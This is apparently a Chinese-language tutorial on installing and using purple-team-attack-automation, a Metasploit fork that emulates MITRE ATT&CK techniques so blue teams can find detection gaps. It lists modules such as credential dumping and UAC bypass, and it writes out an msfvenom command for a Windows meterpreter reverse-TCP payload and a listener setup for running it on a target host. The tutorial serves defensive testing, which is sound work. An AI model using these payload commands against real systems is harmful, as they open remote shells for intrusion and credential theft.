purple-team-attack-automation(紫色团队攻击自动化)学习与研究

1. 简介

该工具是原始metasploit框架的分支，用于模拟攻击者的战术，技术和程序（TTP）。该工具的主要重点是帮助Blue Teams了解其映射到MITER ATT＆CK?框架的检测差距。

2. 可用模块

2.1 Windows

• Windows：ADIDNS（PowerMad）
• Windows：Active Directory自动发现（BloodHound）
• Windows：数据压缩（T1002）
• Windows：凭证转储（T1003）
• Windows：Winlogon帮助器DLL（T1004）
• Windows：来自本地系统的数据（T1005）
• Windows：系统服务发现（T1007）
• Windows：应用程序窗口发现（T1010）
• Windows：查询注册表（T1012）
• Windows：端口监视器（T1013）
• Windows：辅助功能（T1015）
• Windows：系统网络配置发现（T1016）
• Windows：远程系统发现（T1018）
• Windows：快捷方式修改（T1023）
• Windows：Windows远程管理（T1028）
• Windows：修改现有服务（T1031）
• Windows：系统所有者/用户发现（T1033）
• Windows：路径拦截（T1034）
• Windows：服务执行（T1035）
• Windows：伪装（T1036）
• Windows：登录脚本（T1037）
• Windows：文件系统权限不足（T1044）
• Windows：Windows管理规范（T1047）
• Windows：系统网络连接发现（T1049）
• Windows：新服务（T1050）
• Windows：计划任务（T1053）
• Windows：流程注入（T1055）
• Windows：输入捕获（T1056）
• Windows：进程发现（T1057）
• Windows：运行键（T1060）
• Windows：安全软件发现（T1063）
• Windows：权限组发现（T1069）
• Windows：从工具中删除指示器（T1070）
• Windows：通过哈希（T1075）
• Windows：Windows管理员共享（T1077）
• Windows：有效帐户（T1078）
• Windows：文件中的凭据（T1081）
• Windows：系统信息发现（T1082）
• Windows：文件和目录发现（T1083）
• Windows：Windows管理规范事件订阅（1084）
• Windows：Rundll32（T1085）
• Windows：PowerShell（T1086）
• Windows：帐户发现（T1087）
• Windows：绕过UAC（T1088）
• Windows：禁用安全工具（T1089）
• Windows：Windows NTFS扩展属性（T1096）
• Windows：帐户操作（T1098）
• Windows：Timestomp（T1099）
• Windows：AppInit DLL（T1103）
• Windows：远程文件复制（T1105）
• Windows：文件删除（T1107）
• Windows：暴力破解（T1110）
• Windows：修改注册表（T1112）
• Windows：屏幕捕获（T1113）
• Windows：剪贴板数据（T1115）
• Windows：Regsvr32（T1117）
• Windows：InstallUtil（T1118）
• Windows：自动收集（T1119）
• Windows：外围设备发现（T1120）
• Windows：Regsvcs/Regasm（T1121）
• Windows：音频捕获（T1123）
• Windows：系统时间发现（T1124）
• Windows：视频捕获（T1125）
• Windows：受信任的开发人员实用程序（T1127）
• Windows：安装根证书（T1130）
• Windows：身份验证程序包（T1131）
• Windows：网络共享发现（T1135）
• Windows：创建帐户（T1136）
• Windows：MSHTA（T1170）
• Windows：分布式组件对象模型（T1175）
• Windows：屏幕保护程序（T1180）
• Windows：CMSTP（T1191）
• Windows：控制面板项目（T1196）
• Windows：BITS作业（T1197）
• Windows：密码策略发现（T1201）
• Windows：Kerberoasting（T1208）
• Windows：时间提供者（T1209）
• Windows：签名的二进制代理执行（T1218）

2.2 Linux

• Linux：系统网络配置发现（T1016）
• Linux：系统所有者/用户发现（T1033）
• Linux：系统网络连接发现（T1049）
• Linux：进程发现（T1057）
• Linux：权限组发现（T1069）
• Linux：系统信息发现（T1082）
• Linux：帐户发现（T1087）
• Linux：文件删除（T1107）
• Linux：密码策略发现（T1201）

2.3 MacOS

• macOS：数据压缩（T1002）
• macOS：系统网络配置发现（T1016）
• macOS：网络共享发现（T1135）
• macOS：创建帐户（T1136）
• macOS：Bash历史记录（T1139）
• macOS：密码策略发现（T1201）

2.4 Multi

• Multi：远程系统发现（T1018）
• Multi：网络服务扫描（T1046）

具体可参考官方wiki介绍：https://github.com/praetorian-code/purple-team-attack-automation/wiki/Available-Modules

2.工具部署及安装方法

2.1 docker/docker-compose安装

apt-get install docker docker-compose

2.2 下载项目文件至本地

git clone https://github.com/praetorian-code/purple-team-attack-automation.git

2.3 修改LHOST和端口

echo "version: '3' services:ms:environment:# example of setting LHOSTLHOST: 0.0.0.0# example of adding more portsports:- 8080:8080- 443:443- 80:80 " > docker-compose.local.override.yml #此文件需要自行创建，然后复制上述内容写入文档即可

2.4 设置COMPOSE_FILE环境变量

echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env

2.5 运行docker服务并运行工具

service docker start
docker-compose build
./docker/bin/msfconsole #当前目录下执行此命令

其他环境安装可参考官方说明：https://github.com/praetorian-code/purple-team-attack-automation/wiki/Installation

3. 操作与使用

3.1 生成Meterpreter有效载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<Your locahost IP> LPORT=4444 -f exe > meterpreter.exe  #新建窗口执行命令，利用此命令生成的MSF载荷可能存在问题，建议自行修改

3.2 启动并运行本地监听

 use exploit/multi/handlerset Interrupt: use the 'exit' command to quitset PAYLOAD windows/meterpreter/reverse_tcpset LHOST <Attacker IP Address>set LPORT 4444exploit -j -z# docker msfconsole中执行监听命令

复制并在目标（“受害者”）主机上以管理员身份运行payload.exe，然后等待会话。

3.3 查看已有TTP模块

search purple
# docker msfconsole中执行

3.4 模拟T1087

use modules/post/windows/purple/t1087 #设置要使用的TTP
info #查看TTP模块配置
set session 1  #设置会话
run #执行载荷
#docker msfconsole中执行

后续

安全从业人员（尤其是蓝队成员），可以利用purple-team-attack-automation模拟相关TTP，并在客户端部署并配置相关审核策略，记录相关事件日志（windows_log/sysmon/message），并转发至大数据分析平台（splunk/elk等）进行数据分析，提升蓝队成员对攻击的理解以及对异常行为的敏感度。

关于purple-team-attack-automation(紫色团队攻击自动化)更多信息可参考项目原址介绍：https://github.com/praetorian-code/purple-team-attack-automation

关于ATT&CK具体TTP中文介绍可参考瀚思科技MITRE ATT&CK 攻击知识库（企业）中文版项目：https://hansight.github.io/#/

关于ATT&CK具体TTP原文介绍可参考MITER官方介绍：https://attack.mitre.org/